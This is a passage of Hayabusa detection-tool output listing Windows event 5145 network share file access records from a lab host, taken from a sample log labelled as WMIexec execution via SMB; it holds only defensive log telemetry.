Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 
0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 